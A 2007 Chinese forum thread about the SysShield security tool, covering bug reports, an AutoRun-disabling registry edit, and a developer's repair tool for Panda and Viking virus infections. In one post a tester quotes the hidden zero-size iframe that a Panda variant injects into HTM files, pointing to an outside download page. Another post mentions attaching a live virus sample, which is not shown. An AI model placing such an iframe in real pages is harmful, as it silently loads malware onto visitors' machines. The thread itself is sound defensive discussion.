[sysshield]系统安全盾

xhlcs

不知为什么，安装以后开机时间明显拖长，不知各位有没有同感？

hzqp

今天用了一下午，终于看完了这个长贴。

这个软件很好用！精品！

但如何设置，我还是不太清楚。

楼主有时间给上上课。谢谢！

求教一个小问题：
现在的木马都会在每个文件夹下生成一个  *.ini  的文件，如：_desktop.ini  ， Desktop_.ini 。
它生成这个文件有什么用呢？
它不生成这样一个文件不是更隐秘吗？
我局域网中的电脑上完全共享文件夹下经常跑来这样的文件，但我的电脑却没有中毒呀。

另一个问题，这里有一段介绍禁止硬盘自动运行的说明，我走了一个极端，不知行不行？请高手指点：
关闭硬盘AutoRun功能也是防范黑客入侵的有效方法之一。具体方法是在“开始”菜单的“运行”中输入Regedit，打开注册表编辑器，展开到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer主键下，在右侧窗格中找到“NoDriveTypeAutoRun”，就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。
　　双击“NoDriveTypeAutoRun”，在默认状态下（即你没有禁止过AutoRun功能），在弹出窗口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00，如图所示（图2）。其中第一个值“95”是十六进制值，它是所有被禁止自动运行设备的和。将“95”转为二进制就是10010101，其中每位代表一个设备，Windows中不同设备会用如下数值表示：
设备名称　　　　 第几位 值 设备用如下数值表示  设备名称含义
　　DKIVE_UNKNOWN　　  0　　1　　01h　　　　　　   不能识别的设备类型
　　DRIVE_NO_ROOT_DIR  1　　0　　02h　　　　　　   没有根目录的驱动器(Drive without root directory)
　　DRIVE_REMOVABLE　　2　　1　　04h　　　　　　   可移动驱动器(Removable drive)
　　DRIVE_FIXED　　　　3　　0　　08h　　　　　　   固定的驱动器(Fixed drive)  
　　DRIVE_REMOTE　　   4　　1　　10h　　　　　　   网络驱动器(Network drive)
　　DRIVE_CDROM　　　　5　　0　　20h　　　　　　   光驱(CD-ROM)　　
　　DRIVE_RAMDISK　　  6　　0　　40h　　　　　　   RAM磁盘(RAM Disk)
　　保留　　　　　　   7　　1　　80h　　　　　　   未指定的驱动器类型(Not yet  specified drive disk)
　　在上面所列的表中值为“0”表示设备运行，值为“1”表示该设备不运行（默认情况下，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是十六进制的95h，所以NoDriveTypeAutoRun”默认键值为95,00,00,00）。

由上面的分析不难看出，在默认情况下，会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备，所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱动器，即硬盘。这样一来，原来的10010101（在表中“值”列中由下向上看）就变成了二进制的10011101，转为十六进制为9D。现在，将“NoDriveTypeAutoRun”的键值改为9D,00,00,00后关闭注册表编辑器，重启电脑后就会关闭硬盘的AutoRun功能。
    我把所有设备都设置成的“不运行” 也就是11111111 转换成16进制就是FF
注册表是这样的：
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000ff

不知对不对，谢谢！

[ 本帖最后由 hzqp 于 2007-1-10 01:52 PM 编辑 ]

peak8

c:\windows\system32\dwwin.exe -x -s 3260½ø³Ì´´½¨±»×èÖ¹ 2007-01-11 10:56:32
c:\windows\system32\drwtsn32 -p 2192 -e 2680 -g½ø³Ì´´½¨±»×èÖ¹ 2007-01-11 10:56:38

happymh

安全盾1.52版，有时要暂停监视后才可以把U盘安全删除硬件,这是正常现象吧？

yht

wang空间已更新:安全盾1.54

安全盾1.54更新说明

解决开机延时现象。
优化进程显示页，提高响应速度。
对于PE文件若删除失败,则首先尝试延时删除,失败再尝试重命名操作。
重大Bug修复,进程管理页不知从哪个版本起丢失了每个进程前的选框,所以一杀进程就出错，本版修正。

wang6071

安全盾1.54更新说明

  解决开机延时现象。
  优化进程显示页，提高响应速度。
  对于PE文件若删除失败,则首先尝试延时删除,失败再尝试重命名操作。
  重大Bug修复,进程管理页不知从哪个版本起丢失了每个进程前的选框,所以一杀进程就出错，本版修正。

-------------------------
1:安全盾1.52版，有时要暂停监视后才可以把U盘安全删除硬件,这是正常现象吧？
   应该与安全盾无关,但win可能在开启浏览U盘窗口时(或读取U盘文件信息时，此时U盘灯会闪烁)无法删除硬件.

2:gmail页面为何要下载并运行一个dwwin.exe和drwtsn32?原因不清楚,可能是该页面所需的某个插件引起的。

3:_desktop.ini  ， Desktop_.ini 。它生成这个文件有什么用呢？
未分析过，你查看一下文件内容，猜想是作为已感染的标志用的。关于关闭硬盘AutoRun的注册表键值，建个Autorun.inf做个测试还不容易？不过我有点怀疑它的效果，因为木马既然可以修复显示隐藏文件的键值，更改这个键值并不麻烦，还不如在各盘建Autorun.inf文件夹，并在其下建立带点文件夹使其无法删除保险．

4:syscheck服务页加入的文件创建时间,表明的是文件复制到本机时的生成时间，修改时间是文件最终编辑后的时间．如果一个文件被多次复制，创建时间会变化但修改时间不会变化(除非程序动手脚有意修改)

[ 本帖最后由 wang6071 于 2007-1-11 11:38 PM 编辑 ]

yht

发现安全盾1.54的全局黑名单勾选栏失效!!
  解决!系统重启后正常!

[ 本帖最后由 yht 于 2007-1-12 11:01 AM 编辑 ]

curclew

好像不能禁止建立文件夹？

baby178

发现安装1.54版后会将原来的监控设置全部删除掉了.又要重新设置一次.

emca

安全盾重大BUG！
当规则有效的情况下，如果我们创建规则中禁止的目录，或者复制被禁止的目录和文件，则肯定是能够阻止；但如果我们使用复制、粘贴的方法，则阻止规则失效！
因此可能要监视的文件操作函数要扩展到复制粘贴上了！否则……嘿嘿～

    By 深山红叶

sunkist

开机时进入，特别慢，卡在那里什么也动不了。。。

pz

在非管理员用户下，安全盾不能正常运行。希望能加以改进。

zgrrr

1.54安全盾把放开的文件夹也阻止更新了，是否与全局黑名单有关？

fall_els

最近试用了这个！！
感觉软件虽小，但是真的挺强大的！！
特地过来向高手学习！！

谢谢了！！

xdg3669

支持！WANG兄。

yht

支持WANG兄!!!

ah1283328

本人负责管理几个机房，其中一个60左右机器的机房被传染上了熊猫病毒，原来机器里没装安全盾，后来找几台装上试验一下，系统2000server，机器系统杀软有些已经失效，用专杀1。6也杀了，发现重启时安全盾被干掉，网络没有断开，系统也没设密码，图标都被修改了，有时间只能整个机房断网重新整理了。当然偶的机器没事，只装了安全盾，偶尔用一下咔吧绿色版。
感谢作者的无私奉献。

frankkf

支持！WANG兄。

wang6071

原帖由 ah1283328 于 2007-1-17 02:02 PM 发表
本人负责管理几个机房，其中一个60左右机器的机房被传染上了熊猫病毒，原来机器里没装安全盾，后来找几台装上试验一下，系统2000server，机器系统杀软有些已经失效，用专杀1。6也杀了，发现重启时安全盾被干掉，网 ...

试一试偶新做的威金熊猫专杀
--------------------------------------------------------------------------------------------------------------
MyviKer说明

   为避免程序受威金等病毒感染，程序已先更名为Myviker.bat文件，实际上这个程序仍是PE文件。修复中会自动分析删除各盘根目录下的Autorun.inf及它所启动的程序。

   同时，本终结器使用自动搜索分析修复已感染的PE文件,无需特征码升级，理论上可修复一切熊猫威金任何变种修改的PE文件。

   当然，为避免出现修复失败破坏文件，你可以先将有问题的文件放到一个新建目录下尝试一下修复效果。如果成功就可以放心地全盘修复了。

xsy

支持！WANG兄,又有好东西,万分敬仰

sunkist

谢谢Wang兄的威金熊猫通用终结器

ah1283328

谢谢，偶现在才看到，一会去杀杀看。不知有什么好的预防措施吗？

紫狐

原帖由 wang6071 于 2007-1-18 12:18 AM 发表


试一试偶新做的威金熊猫专杀
--------------------------------------------------------------------------------------------------------------
MyviKer说明

   为避免程序受威金等病毒感染，程序已 ...

新的熊猫变种无法杀，还有，会误杀少数文件。

wang6071

MyviKiller.exe 1.1版修正了上一版在自动删除AutoRun.inf时对已启动的进程无法结束的错误,增加了对非常目录运行的程序的删除,自动恢复隐藏文件显示。

原帖由 紫狐 于 2007-1-18 11:29 AM 发表
新的熊猫变种无法杀，还有，会误杀少数文件。

如果熊猫变种破坏或者是加密了PE文件当然无法恢复。
至于误杀因为是通用性的分析感染的PE文件，所以少量用此类方法加密的程序可能被误杀，不过此类程序在正常用户系统上应该是很少的。即使误杀，也只需重装少量程序即可。

wang6071

原帖由 lxhyhl 于 2007-1-18 02:15 PM 发表
无法查杀威金熊猫变种。


附威金熊猫病毒，下载后果自负。

本工具因没有使用特征码,当然无法直接查杀病毒体(你那个附件是直接的病毒体,所以无法修复,你可以试试此附件感染了的文件的修复).只有感染了的机器上运行,才会边修复感染文件,同时提取病毒体来杀除.

所以在感染的机器上可以先修复一个感染目录让软件提取病毒体,再全盘查杀清除病毒体并修复感染文件.

-------------------------------------------------------------------------
1.2版,因为本程序是边恢复文件边提取样本,所以对未感染的系统无修复作用。也就是说它不会对只有病毒体的样本进行查杀。

同时，考虑到病毒体可能已经运行，修复过程中可能会发生重复感染的情况，可以先选择一个已感染的文件夹来检测，从而让程序提取病毒体。然后再做全盘检测即可先终止病毒进程，删除病毒源后修复文件。

友情提示：本程序的重点在于恢复被感染的文件，所以你可以先用syscheck等清除病毒源再用这个程序来修复感染的程序。由于本程序是基于分析文件结构的修复，所以可以多次运行修复(适用于双重或多重感染的情况，此时每修复一次相当于脱一层壳)。

[ 本帖最后由 wang6071 于 2007-1-18 07:21 PM 编辑 ]

hzqp

原帖由 wang6071 于 2007-1-18 12:18 AM 发表


试一试偶新做的威金熊猫专杀
--------------------------------------------------------------------------------------------------------------
MyviKer说明

   为避免程序受威金等病毒感染，程序已 ...

在VPC中试了，先运行包里的熊猫变种和SXS变种，过一会儿再杀能杀死病毒，但对熊猫，有两点：
一是如图，我就不说了。二是变种的熊猫会向HTM文件后面加上这样一段，但没有进行恢复。
<iframe src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></iframe>


特别提醒，菜鸟别玩呀！

[ 本帖最后由 6618 于 2007-1-19 06:55 AM 编辑 ]

wang6071

删除不了是因为偶的终止进程力度不够,下面这个附件增强了一点杀进程的力度。

HTM文件则本来就未打算做恢复(一般用户没有这个需求，清空IE临时文件，全盘删除html避免调用即可。)，因为这个特征串随时都可更换，而每个HTM文件均分析查询可能要花一定的时间而且以后这个特征可能会变化，所以没做这个文件的恢复功能。现成有许多支持批量查找替换的软件，估计可以做这个工作。

jysy182

xie xie le

baby178

谢谢大大们提供熊猫围巾通用终结器,现在这两个病毒太猖獗了.

hoho1234

不错，备用下